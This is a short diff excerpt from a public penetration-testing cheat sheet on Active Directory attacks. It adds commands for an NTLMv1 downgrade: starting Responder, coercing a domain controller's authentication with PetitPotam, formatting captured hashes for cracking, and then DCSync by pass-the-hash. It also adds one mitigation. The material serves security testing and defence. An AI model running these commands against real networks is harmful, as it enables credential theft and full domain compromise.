swisskyrepo/PayloadsAllTheThings/Methodology and Resources/Active Directory Attack.md

     Challenge = 1122334455667788
     ```
 * Fire Responder: `responder -I eth0 --lm`
+* Force a callback:
+    ```ps1
+    PetitPotam.exe Responder-IP DC-IP # Patched around August 2021
+    PetitPotam.py -u Username -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IP # Not patched for authenticated users
+    ```
 * If you got some `NTLMv1 hashes`, you need to format then submit them on [crack.sh](https://crack.sh/netntlm/), or crack them with Hashcat/John
     ```ps1
     username::hostname:response:response:challenge -> NTHASH:response
     NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972
     ```
+* Now you can DCSync using the Pass-The-Hash with the DC machine account

 :warning: NTLMv1 with SSP(Security Support Provider) changes the server challenge and is not quite ideal for the attack, but it can be used.

+**Mitigations**:

+* Set the Lan Manager authentication level to `Send NTLMv2 responses only.
+Refuse LM & NTLM`

 ### Capturing and cracking Net-NTLMv2/NTLMv2 hashes